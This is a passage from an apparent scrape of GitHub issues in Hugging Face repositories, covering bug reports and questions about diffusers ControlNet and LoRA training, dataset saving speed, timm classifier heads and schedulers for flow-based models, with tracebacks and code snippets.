"title": "HeaderTooLarge when train controlnet with sdv3", "body": "### Describe the bug\n\nHello, I tried diffuser to train controlnet with sdv3 but it didn't start training and send `safetensors_rust.SafetensorError: Error while deserializing header: HeaderTooLarge` feedback. I don't know how to handle it.\n\n### Reproduction\n\nFollow the README_v3 guide.\n\n### Logs\n\n```shell\n(diffusers) [liudongyu@localhost controlnet]$ accelerate launch train_controlnet_sd3.py --pretrained_model_name_or_path=$MODEL_DIR --output_dir=$OUTPUT_DIR --train_data_dir=\"/home/users/liudongyu/datasets\" --resolution=1024 --learning_rate=1e-5 --max_train_steps=20000 --train_batch_size=1 --gradient_accumulation_steps=4\r\nDetected kernel version 3.10.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.\r\n11/14/2024 15:16:14 - INFO - __main__ - Distributed environment: DistributedType.NO\r\nNum processes: 1\r\nProcess index: 0\r\nLocal process index: 0\r\nDevice: cuda\r\n\r\nMixed precision type: no\r\n\r\nYou set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type t5 to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\n{'max_image_seq_len', 'base_image_seq_len', 'use_dynamic_shifting', 'max_shift', 'base_shift'} was not found in config. 
Values will be initialized to default values.\r\nTraceback (most recent call last):\r\n File \"/home/users/liudongyu/diffuser/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 1423, in \r\n main(args)\r\n File \"/home/users/liudongyu/diffuser/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 982, in main\r\n text_encoder_one, text_encoder_two, text_encoder_three = load_text_encoders(\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/home/users/liudongyu/diffuser/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 187, in load_text_encoders\r\n text_encoder_two = class_two.from_pretrained(\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/transformers/modeling_utils.py\", line 3789, in from_pretrained\r\n with safe_open(resolved_archive_file, framework=\"pt\") as f:\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\nsafetensors_rust.SafetensorError: Error while deserializing header: HeaderTooLarge\r\nTraceback (most recent call last):\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/bin/accelerate\", line 8, in \r\n sys.exit(main())\r\n ^^^^^^\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/accelerate/commands/accelerate_cli.py\", line 48, in main\r\n args.func(args)\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/accelerate/commands/launch.py\", line 1168, in launch_command\r\n simple_launcher(args)\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/accelerate/commands/launch.py\", line 763, in simple_launcher\r\n raise subprocess.CalledProcessError(returncode=process.returncode, cmd=cmd)\r\nsubprocess.CalledProcessError: Command '['/home/users/liudongyu/anaconda3/envs/diffusers/bin/python', 'train_controlnet_sd3.py', '--pretrained_model_name_or_path=stabilityai/stable-diffusion-3-medium-diffusers', '--output_dir=sd3-controlnet-out', '--train_data_dir=/home/users/liudongyu/datasets', '--resolution=1024', '--learning_rate=1e-5', '--max_train_steps=20000', '--train_batch_size=1', '--gradient_accumulation_steps=4']' returned non-zero exit status 1.\n```\n\n\n### System Info\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-3.10.0-1160.114.2.el7.x86_64-x86_64-with-glibc2.17\r\n- Running on Google Colab?: No\r\n- Python version: 3.11.10\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.2\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.0\r\n- PEFT version: not installed\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA A100-PCIE-40GB, 40960 MiB\r\nNVIDIA A100 80GB PCIe, 81920 MiB\r\n- Using GPU in script?: yes\r\n- Using distributed or parallel set-up in script?: no\r\n\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9927", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-14T07:28:03Z", "updated_at": "2024-11-21T13:02:05Z", "comments": 3, "user": "Viola-Siemens" }, { "repo": "huggingface/datasets", "number": 7290, "title": "`Dataset.save_to_disk` hangs when using num_proc > 1", "body": "### Describe the bug\n\nHi, I'm encountered a small issue when saving 
datasets that led to the saving taking up to multiple hours.\r\nSpecifically, [`Dataset.save_to_disk`](https://huggingface.co/docs/datasets/main/en/package_reference/main_classes#datasets.Dataset.save_to_disk) is a lot slower when using `num_proc>1` than when using `num_proc=1`\r\n\r\nThe documentation mentions that \"Multiprocessing is disabled by default.\", but there is no explanation on how to enable it.\n\n### Steps to reproduce the bug\n\n```\r\nimport numpy as np\r\nfrom datasets import Dataset\r\n\r\nn_samples = int(4e6)\r\nn_tokens_sample = 100\r\ndata_dict = {\r\n 'tokens' : np.random.randint(0, 100, (n_samples, n_tokens_sample)),\r\n}\r\n\r\ndataset = Dataset.from_dict(data_dict)\r\ndataset.save_to_disk('test_dataset', num_proc=1)\r\ndataset.save_to_disk('test_dataset', num_proc=4)\r\ndataset.save_to_disk('test_dataset', num_proc=8)\r\n```\r\n\r\nThis results in:\r\n```\r\n>>> dataset.save_to_disk('test_dataset', num_proc=1)\r\nSaving the dataset (7/7 shards): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4000000/4000000 [00:17<00:00, 228075.15 examples/s]\r\n>>> dataset.save_to_disk('test_dataset', num_proc=4)\r\nSaving the dataset (7/7 shards): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4000000/4000000 [01:49<00:00, 36583.75 examples/s]\r\n>>> dataset.save_to_disk('test_dataset', num_proc=8)\r\nSaving the dataset (8/8 shards): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4000000/4000000 [02:11<00:00, 30518.43 examples/s]\r\n```\r\n\r\nWith larger datasets it can take hours, but I didn't benchmark that for this bug report.\n\n### Expected behavior\n\nI would expect using `num_proc>1` to be faster instead of slower than `num_proc=1`. \n\n### Environment info\n\n- `datasets` version: 3.1.0\r\n- Platform: Linux-5.15.153.1-microsoft-standard-WSL2-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.26.2\r\n- PyArrow version: 18.0.0\r\n- Pandas version: 2.2.3\r\n- `fsspec` version: 2024.6.1", "url": "https://github.com/huggingface/datasets/issues/7290", "state": "open", "labels": [], "created_at": "2024-11-14T05:25:13Z", "updated_at": "2025-11-24T09:43:03Z", "comments": 4, "user": "JohannesAck" }, { "repo": "huggingface/trl", "number": 2356, "title": "How to train from scratch? 
Can you provide the code", "body": "### System Info\n\n train from scratch\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n train from scratch\n\n### Expected behavior\n\n train from scratch\n\n### Checklist\n\n- [X] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [X] I have included my system information\n- [X] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [X] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [X] Any traceback provided is complete", "url": "https://github.com/huggingface/trl/issues/2356", "state": "closed", "labels": [ "\u2753 question" ], "created_at": "2024-11-14T02:39:41Z", "updated_at": "2024-12-13T23:00:20Z", "user": "sankexin" }, { "repo": "huggingface/sentence-transformers", "number": 3054, "title": "'scale' hyperparameter in MultipleNegativesRankingLoss", "body": "I am looking through the MultipleNegativesRankingLoss.py code and I have question about the 'scale' hyperparameter. Also known as the 'temperature', the scale is used to stretch or compress the range of output values from the similarity function. A larger scale creates greater distinction between positive and negative examples in terms of similarity score differences. The line below is how the scale is used in the forward function of the loss. \r\n\r\n`scores = self.similarity_fct(embeddings_a, embeddings_b) * self.scale`\r\n\r\nCurrently, the scale is set to 20 for when cosine similarity is used as the distance metric. \r\n\r\nWhy was 20 selected as the scale for when using cosine similarity on the embeddings? Is this the optimal scale value for cosine similarity? Would this hyperparameter need to be optimized during fine-tuning? ", "url": "https://github.com/huggingface/sentence-transformers/issues/3054", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-14T00:11:23Z", "updated_at": "2025-01-16T13:54:45Z", "user": "gnatesan" }, { "repo": "huggingface/diffusers", "number": 9924, "title": "Can we get more schedulers for flow based models such as SD3, SD3.5, and flux", "body": "It seems advanced schedulers such as DDIM, and the dpm++ 2m does work with flow based model such as SD3, SD3.5, and flux. \r\nHowever, I only see 2 flow based schedulers in diffusers codebase:\r\n\r\nFlowMatchEulerDiscreteScheduler, and'\r\nFlowMatchHeunDiscreteScheduler\r\n\r\nI tried to use DPMSolverMultistepScheduler, but it does not generate correct images with flow based models. 
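\r\n\r\nTo be concrete, the only thing that works for me is swapping between the two flow-match schedulers that do exist -- a sketch (SD3 medium as an example):\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import FlowMatchHeunDiscreteScheduler, StableDiffusion3Pipeline\r\n\r\npipe = StableDiffusion3Pipeline.from_pretrained(\r\n    \"stabilityai/stable-diffusion-3-medium-diffusers\", torch_dtype=torch.float16\r\n).to(\"cuda\")\r\n\r\n# swapping FlowMatchEuler -> FlowMatchHeun works; DPMSolverMultistep does not\r\npipe.scheduler = FlowMatchHeunDiscreteScheduler.from_config(pipe.scheduler.config)\r\nimage = pipe(\"a photo of an astronaut\", num_inference_steps=28).images[0]\r\n```\r\n\r\n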
Help?\r\n", "url": "https://github.com/huggingface/diffusers/issues/9924", "state": "open", "labels": [ "wip", "scheduler" ], "created_at": "2024-11-14T00:07:56Z", "updated_at": "2025-01-14T18:31:12Z", "comments": 40, "user": "linjiapro" }, { "repo": "huggingface/pytorch-image-models", "number": 2332, "title": "[BUG] How to customize the number of classification heads", "body": "**Describe the bug**\r\n\r\n\r\n**To Reproduce**\r\nSteps to reproduce the behavior:\r\nfrom timm.models import create_model\r\ncheckpoint_path = \"/nas_mm_2/yinxiaofei.yxf/open_source_model/InternViT-300M-448px/tmp/timm__vit_intern300m_patch14_448.ogvl_dist/model.safetensors\"\r\nmodel = create_model('vit_intern300m_patch14_448',checkpoint_path=checkpoint_path, num_classes = 3)\r\n\r\n\r\n**Screenshots**\r\nRuntimeError: Error(s) in loading state_dict for VisionTransformer:\r\nMissing key(s) in state_dict: \"head.weight\", \"head.bias\". \r\n\r\n\r\n**Additional context**\r\nIf I remove the num_classes = 3 parameter, then this program is completely normal\r\n", "url": "https://github.com/huggingface/pytorch-image-models/issues/2332", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-12T08:08:50Z", "updated_at": "2024-11-12T15:28:42Z", "user": "JarvisFei" }, { "repo": "huggingface/unity-api", "number": 30, "title": "[QUESTION]", "body": "I have a simple game built in unity and I'm using this Hugging face API client for voice parsing. I'm trying to understand when I build and run the game, and want to distribute it to many users, how do I keep the same api key every time so that users can install and run voice control it without any issue?", "url": "https://github.com/huggingface/unity-api/issues/30", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-12T02:35:52Z", "updated_at": "2024-11-20T01:46:16Z", "user": "harshal-14" }, { "repo": "huggingface/swift-transformers", "number": 140, "title": "How to use customized tokenizer?", "body": "Hello. I am writing this post because I have a question about loading the tokenizer model. I am trying to use a pre-trained tokenizer in a Swift environment. After training, how do I apply the byproduct .model and .vocab files so that I can use the tokenizer I trained in Swift while using the swift-transformer API? I would appreciate it if you could answer.", "url": "https://github.com/huggingface/swift-transformers/issues/140", "state": "open", "labels": [ "tokenization" ], "created_at": "2024-11-11T09:36:14Z", "updated_at": "2025-09-10T13:19:10Z", "user": "cch1219" }, { "repo": "huggingface/diffusers", "number": 9900, "title": "Potential bug in repaint?", "body": "https://github.com/huggingface/diffusers/blob/dac623b59f52c58383a39207d5147aa34e0047cd/src/diffusers/schedulers/scheduling_repaint.py#L322\r\n\r\nAccording to line5 of algorithm 1 in the paper, the second part in line 322 should remove the `**0.5`?\r\nthanks!", "url": "https://github.com/huggingface/diffusers/issues/9900", "state": "closed", "labels": [], "created_at": "2024-11-10T10:41:26Z", "updated_at": "2024-12-16T19:38:22Z", "comments": 3, "user": "jingweiz" }, { "repo": "huggingface/finetrainers", "number": 82, "title": "[question] what is the difference between cofgvideo scheduler and normal diffuers scheduler", "body": "### Feature request / \u529f\u80fd\u5efa\u8bae\n\nCogVideoXDPMScheduler VS DPMSCheduler\r\nCogVideoXDDIMScheduler VS DDIM Scheduler\r\nHi Aryan, is there any sampling difference between these two sampler? 
\r\n@a-r-r-o-w \n\n### Motivation\n\n/\n\n### Your contribution\n\n/", "url": "https://github.com/huggingface/finetrainers/issues/82", "state": "closed", "labels": [], "created_at": "2024-11-09T17:15:57Z", "updated_at": "2024-12-19T14:43:23Z", "user": "foreverpiano" }, { "repo": "huggingface/optimum", "number": 2092, "title": "Add support for RemBERT in the ONNX export", "body": "### Feature request\n\nAdd RemBERT to the supported architectures for ONNX export.\n\n### Motivation\n\nSupport for [RemBert](https://huggingface.co/docs/transformers/model_doc/rembert) was previously available in Transformers; see [here](https://github.com/huggingface/transformers/issues/16308). However, it now seems that RemBERT is no longer supported.\n\n### Your contribution\n\nI can help by testing the implementation, or by providing the code if pointed to a tutorial. I was not able to find documentation on how to do that.", "url": "https://github.com/huggingface/optimum/issues/2092", "state": "closed", "labels": [ "onnx" ], "created_at": "2024-11-08T15:12:34Z", "updated_at": "2024-12-02T13:54:10Z", "comments": 1, "user": "mlynatom" }, { "repo": "huggingface/lerobot", "number": 502, "title": "Low accuracy for diffusion policy+aloha env+sim_transfer_cube_human dataset", "body": "I'm trying to use the diffusion policy and the aloha env to train on the sim_transfer_cube_human dataset. But after 60000 training steps, the evaluation accuracy is only 2%-6%. I don't know why. If I load the pre-trained ACT policy, the accuracy can reach 80%.", "url": "https://github.com/huggingface/lerobot/issues/502", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2024-11-08T02:20:14Z", "updated_at": "2025-11-29T02:48:27Z", "user": "Kimho666" }, { "repo": "huggingface/local-gemma", "number": 41, "title": "How to load from file?", "body": "How do I load a model from a file, e.g. an .h5 file, instead of downloading the model?\r\nEspecially a model saved by keras_nlp.", "url": "https://github.com/huggingface/local-gemma/issues/41", "state": "open", "labels": [], "created_at": "2024-11-07T03:01:25Z", "updated_at": "2024-11-07T03:03:31Z", "user": "datdq-abivin" }, { "repo": "huggingface/diffusers", "number": 9876, "title": "Why isn\u2019t VRAM being released after training LoRA?", "body": "### Describe the bug\n\nWhen I use train_dreambooth_lora_sdxl.py, the VRAM is not released after training. 
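\r\n\r\nWhat I already tried after the training loop finishes (a sketch; `pipeline` and `optimizer` stand in for whatever the script keeps alive):\r\n\r\n```python\r\nimport gc\r\n\r\nimport torch\r\n\r\n# drop every reference the script still holds, then release cached blocks\r\ndel pipeline, optimizer\r\ngc.collect()\r\ntorch.cuda.empty_cache()\r\nprint(f\"{torch.cuda.memory_allocated() / 2**20:.0f} MiB still allocated\")\r\n```\r\n\r\nEven after this, the memory still isn't freed. 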
How can I fix this?\n\n### Reproduction\n\nNot used.\n\n### Logs\n\n_No response_\n\n### System Info\n\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.14.0-284.25.1.el9_2.x86_64-x86_64-with-glibc2.17\r\n- Running on Google Colab?: No\r\n- Python version: 3.8.20\r\n- PyTorch version (GPU?): 2.2.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.2\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.1\r\n- PEFT version: 0.13.2\r\n- Bitsandbytes version: 0.44.1\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA H800, 81559 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9876", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-11-06T11:58:59Z", "updated_at": "2024-12-13T15:03:25Z", "comments": 14, "user": "hjw-0909" }, { "repo": "huggingface/diffusers", "number": 9866, "title": "Flux controlnet can't be trained, do this script really work?", "body": "### Describe the bug\n\nrun with one num processes, the code broke down and returns:\r\nRuntimeError: Expected to have finished reduction in the prior iteration before starting a new one. This error indicates that your module has parameters that were not used in producing loss. You can enable unused parameter detection by passing the keyword argument `find_unused_parameters=True` to `torch.nn.parallel.DistributedDataParallel`, and by \r\n\r\nrun with more than one processes, the code broke down and returns:\r\nSome NCCL operations have failed or timed out. Due to the asynchronous nature of CUDA kernels, subsequent GPU operations might run on corrupted/incomplete data.\n\n### Reproduction\n\njust follow the instructions and it will be reproduced\n\n### Logs\n\n_No response_\n\n### System Info\n\ndiffusers v0.32\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9866", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-11-05T08:51:57Z", "updated_at": "2024-12-05T15:19:12Z", "comments": 4, "user": "liuyu19970607" }, { "repo": "huggingface/optimum-quanto", "number": 346, "title": "How to support activation 4bit quantization?", "body": "As mentioned in title.", "url": "https://github.com/huggingface/optimum-quanto/issues/346", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-11-04T09:59:21Z", "updated_at": "2024-12-10T02:10:31Z", "user": "Ther-nullptr" }, { "repo": "huggingface/transformers", "number": 34591, "title": "How to retrain the GLIP model on the Object365 dataset", "body": "Since I made some modifications to the GLIP model, I need to perform some pre-training again to improve performance. I replaced `_base_ = [../_base_/datasets/coco_detection.py]` with `_base_ = [../_base_/datasets/objects365v1_detection.py]` in `glip_atss_swin-t_a_fpn_dyhead_16xb2_ms-2x_funtune_coco.py` to train on Object365. Is this correct?", "url": "https://github.com/huggingface/transformers/issues/34591", "state": "closed", "labels": [], "created_at": "2024-11-04T03:54:17Z", "updated_at": "2024-11-04T06:46:17Z", "user": "Polarisamoon" }, { "repo": "huggingface/diffusers", "number": 9847, "title": "Merge Lora weights into base model", "body": "I have finetuned the stable diffusion model and would like to merge the lora weights into the model itself. 
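\r\n\r\nConcretely, this is the kind of merge I mean -- a sketch, with `fuse_lora` as my best guess at the closest diffusers call and a placeholder LoRA path:\r\n\r\n```python\r\nfrom diffusers import StableDiffusionPipeline\r\n\r\npipe = StableDiffusionPipeline.from_pretrained(\"runwayml/stable-diffusion-v1-5\")\r\npipe.load_lora_weights(\"path/to/my_lora\")\r\n\r\npipe.fuse_lora()  # fold the LoRA deltas into the base weights\r\npipe.unet.save_pretrained(\"./merged_unet\")  # persist the merged UNet\r\n```\r\n\r\n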
Currently I think this is supported in PEFT using the `merge_and_unload` function, but I can't seem to find this option in diffusers. So, is there any way to get a base model with the finetuned weights merged in? If I am not wrong, only the UNet part of the model weights needs to be merged.\r\n\r\nThis is necessary for tasks like feature extraction. ", "url": "https://github.com/huggingface/diffusers/issues/9847", "state": "closed", "labels": [], "created_at": "2024-11-02T18:00:28Z", "updated_at": "2024-11-03T03:03:45Z", "comments": 1, "user": "yaswanth19" }, { "repo": "huggingface/chat-ui", "number": 1550, "title": "Add full-text search in chat history", "body": "## Describe your feature request\r\n\r\nAllow users to search for specific keywords or phrases within the chat history, making it easier to find and recall previous conversations.\r\n\r\n## Screenshots (if relevant)\r\n\r\nAn example of the search bar placement can be found in #1079\r\n\r\n## Implementation idea\r\n\r\nOne possible implementation could be to use a library to index the chat history data. This would allow for efficient and scalable search functionality. The search bar could be added to the chat history interface, and when a user enters a search query, it would send a request to the search index to retrieve relevant results. The results could be displayed in a dropdown list or a separate search results page, with links to the original chat messages.\r\n\r\n## Previous proposals and why this one is different\r\n\r\nI'm aware that a similar proposal was made in the past #243, but it was rejected in favor of using the browser's page search functionality (ctrl + F). However, I'd like to argue that page search does not provide the same functionality as a dedicated full-text search in chat history. Here's why:\r\n\r\n- Page search is limited to the currently loaded chat history and previous chat names, whereas a dedicated search would allow users to search across the entire conversation history, even if it's not currently loaded on the page.\r\n- Page search does not provide any contextual information, such as the date and time of the message, or the conversation, whereas a dedicated search could provide this information and make it easier for users to understand the context of the search results.\r\n\r\nGiven these differences, I believe that a dedicated full-text search in chat history is a valuable feature that would greatly improve the user experience, and I'd like to propose it again for consideration.\r\n\r\nPersonally, I tend to create a new chat for each small problem to keep the LLM focused on what's important. As a result, I end up with too many chats with similar names, which makes the browser page search nearly useless.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1550", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-11-01T19:27:41Z", "updated_at": "2025-05-28T15:03:19Z", "comments": 5, "user": "kadykov" }, { "repo": "huggingface/diffusers", "number": 9837, "title": "[Feature] Is it possible to customize latents.shape / prepare_latent for context parallel case?", "body": "**Is your feature request related to a problem? 
Please describe.**\r\nOne may need to extend the code to context parallel case and the latent sequence length needs to get divided.\r\nInstead of copying all the code of pipeline.py, the minimum modification is just adding few lines about dividing the latent shape and all_gather the result from the output.\r\nI suggest adding this feature so doing the monkey patch will be easier.\r\n", "url": "https://github.com/huggingface/diffusers/issues/9837", "state": "closed", "labels": [ "stale" ], "created_at": "2024-11-01T14:32:05Z", "updated_at": "2024-12-01T15:07:36Z", "comments": 3, "user": "foreverpiano" }, { "repo": "huggingface/diffusers", "number": 9836, "title": "[Feature] Can we record layer_id for DiT model?", "body": "**Is your feature request related to a problem? Please describe.**\r\nSome layerwise algorithm may be based on layer-id.\r\njust need some simple modification for transformer2Dmodel and its inner module like attention part, batch_norm part. just pass the layer_id as an extra parameter.\r\n", "url": "https://github.com/huggingface/diffusers/issues/9836", "state": "closed", "labels": [ "stale" ], "created_at": "2024-11-01T14:26:31Z", "updated_at": "2025-01-27T01:31:21Z", "comments": 9, "user": "foreverpiano" }, { "repo": "huggingface/diffusers", "number": 9835, "title": "unused parameters lead to error when training contrlnet_sd3", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9834\r\n\r\n
\r\n\r\nOriginally posted by **Zheng-Fang-CH** November 1, 2024\r\n![b1fa13bdb595284dce31e3cf189876b](https://github.com/user-attachments/assets/12faa0fc-acb8-4c98-ba03-b0e41bc9075a)\r\nHas anyone else met this problem? I get this error no matter whether I train on a single GPU or multiple GPUs.
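\r\n\r\nIn case it helps narrow things down, the only workaround I found so far is letting DDP tolerate unused parameters via accelerate's kwargs handler -- a sketch:\r\n\r\n```python\r\nfrom accelerate import Accelerator, DistributedDataParallelKwargs\r\n\r\n# let DDP tolerate parameters that receive no gradient in a step\r\nddp_kwargs = DistributedDataParallelKwargs(find_unused_parameters=True)\r\naccelerator = Accelerator(kwargs_handlers=[ddp_kwargs])\r\n```\r\n\r\nBut I would still like to understand why some parameters end up unused in the first place.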
", "url": "https://github.com/huggingface/diffusers/issues/9835", "state": "closed", "labels": [], "created_at": "2024-11-01T13:57:03Z", "updated_at": "2024-11-17T07:33:25Z", "comments": 6, "user": "Daryu-Fan" }, { "repo": "huggingface/diffusers", "number": 9833, "title": "SD3.5-large. Why is it OK when calling with a single thread, but not with multiple threads?", "body": "### Describe the bug\r\n\r\nFirst, I created a SD3.5-large service:\r\n\r\n```python\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\nimport uuid\r\nfrom diffusers import BitsAndBytesConfig, SD3Transformer2DModel, DDIMScheduler, DDPMParallelScheduler\r\nfrom diffusers import StableDiffusion3Pipeline\r\nimport torch\r\nfrom transformers import T5EncoderModel\r\nimport time \r\nfrom flask import request, jsonify\r\nimport logging\r\nimport sys\r\nimport flask\r\n\r\napp = flask.Flask(\"sd_server\")\r\n\r\nhandler = logging.StreamHandler(sys.stdout)\r\nhandler.setFormatter(logging.Formatter(\"[%(asctime)s] %(levelname)s in %(module)s: %(message)s\"))\r\napp.logger.handlers.clear()\r\napp.logger.addHandler(handler)\r\napp.logger.setLevel(logging.INFO)\r\n\r\n# model pipeline\r\nmodel_id = \"../stable-diffusion-3.5-large\"\r\n\r\nnf4_config = BitsAndBytesConfig(\r\n load_in_4bit=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n bnb_4bit_compute_dtype=torch.bfloat16\r\n)\r\nmodel_nf4 = SD3Transformer2DModel.from_pretrained(\r\n model_id,\r\n subfolder=\"transformer\",\r\n quantization_config=nf4_config,\r\n torch_dtype=torch.bfloat16\r\n)\r\nmodel_nf4 = model_nf4.to(\"cuda:0\")\r\npipeline = StableDiffusion3Pipeline.from_pretrained(\r\n model_id, \r\n transformer=model_nf4,\r\n torch_dtype=torch.bfloat16\r\n)\r\n# pipeline.scheduler = DDIMScheduler.from_config(pipeline.scheduler.config)\r\n# pipeline.scheduler = DDPMParallelScheduler.from_config(pipeline.scheduler.config)\r\npipeline = pipeline.to(\"cuda:0\")\r\n\r\n# # diffusers/t5-nf4\r\n# t5_nf4 = T5EncoderModel.from_pretrained(\"text_encoder_3\", torch_dtype=torch.bfloat16)\r\n# t5_nf4 = t5_nf4.to(\"cuda:0\")\r\n\r\n# pipeline = StableDiffusion3Pipeline.from_pretrained(\r\n# model_id, \r\n# transformer=model_nf4,\r\n# text_encoder_3=t5_nf4,\r\n# torch_dtype=torch.bfloat16\r\n# )\r\n# pipeline = pipeline.to(\"cuda:0\")\r\n\r\n\r\ndef generate_uuid_filename(extension=\".jpeg\"):\r\n filename = f\"{uuid.uuid4()}{extension}\"\r\n \r\n return filename\r\n\r\ndef image_generation(prompt, negative_prompt, width, height, save_path, num_inference_steps=28, guidance_scale=4.5, max_sequence_length=512):\r\n image = pipeline(\r\n prompt=prompt,\r\n negative_prompt=negative_prompt,\r\n num_inference_steps=num_inference_steps,\r\n width=width,\r\n height=height,\r\n guidance_scale=guidance_scale,\r\n max_sequence_length=max_sequence_length,\r\n ).images[0]\r\n file_name = generate_uuid_filename()\r\n image.save(os.path.join(save_path, file_name))\r\n torch.cuda.empty_cache()\r\n return f\"{file_name}\u4fdd\u5b58\u5b8c\u6bd5...\"\r\n \r\n\r\ndef update_prompt(req_data):\r\n trans = {\"natural\":[\"cinematic photo ```%s``` \uff0c photograph, film, bokeh, professional, 4k, highly detailed\",\r\n \"drawing, painting, crayon, sketch, graphite, impressionist, noisy, blurry, soft, deformed, ugly\"],\r\n \"vivid\":[\"HDR photo of ``%s``` . 
High dynamic range, vivid, rich details, clear shadows and highlights, realistic, intense, enhanced contrast, highly detailed\",\r\n \"flat, low contrast, oversaturated, underexposed, overexposed, blurred, noisy\"]}\r\n style = \"natural\"\r\n try:\r\n if req_data.get('style') != None:\r\n if req_data.get('style') in trans.keys():\r\n style = req_data.get('style')\r\n except:\r\n pass\r\n import re\r\n try:\r\n req_data[\"promptEnglish\"] = re.findall(r'\\\\\"(.+)\\\\\"',req_data[\"promptEnglish\"])[0]\r\n except:\r\n pass\r\n prompt = trans[style][0]%req_data[\"promptEnglish\"]\r\n negative_prompt = trans[style][1]\r\n if req_data[\"negativePromptEnglish\"] not in [None ,'']:\r\n negative_prompt = req_data[\"negativePromptEnglish\"]\r\n \r\n return prompt, negative_prompt\r\n\r\n@app.route('/api/text_to_img', methods=['POST'])\r\ndef route():\r\n res = {\"id\": \"\",\r\n \"object\": \"image\",\r\n \"created\":int(time.time()),\r\n \"data\":[]}\r\n \r\n req_data = request.json\r\n app.logger.info(req_data)\r\n\r\n prompt, negative_prompt = update_prompt(req_data)\r\n app.logger.info(prompt+\"|\"+negative_prompt)\r\n\r\n width = int(req_data[\"size\"].split(\"x\")[0]) \r\n height= int(req_data[\"size\"].split(\"x\")[1]) \r\n\r\n res[\"data\"] = image_generation(prompt, negative_prompt, width, height, './')\r\n \r\n return jsonify(res)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0',port=12571,threaded=True, debug=False)\r\n```\r\n\r\nThen I called this service concurrently and the following problems occurred\uff1a\r\n\r\n```bash\r\n [2024-11-01 07:32:12,370] INFO in app: {'prompt': '', 'promptEnglish': 'A capybara holding a sign that reads Hello Fast World', 'negative_prompt': '', 'negativePromptEnglish': None, 'style': 'natural', 'size': '1024x1024'}\r\n[2024-11-01 07:32:12,371] INFO in app: cinematic photo ```A capybara holding a sign that reads Hello Fast World``` \uff0c photograph, film, bokeh, professional, 4k, highly detailed|drawing, painting, crayon, sketch, graphite, impressionist, noisy, blurry, soft, deformed, ugly\r\n 4%|\u2588\u2588\u2588\u258b ", "url": "https://github.com/huggingface/diffusers/issues/9833", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-01T08:00:04Z", "updated_at": "2024-11-02T02:14:50Z", "comments": 1, "user": "EvanSong77" }, { "repo": "huggingface/diffusers", "number": 9825, 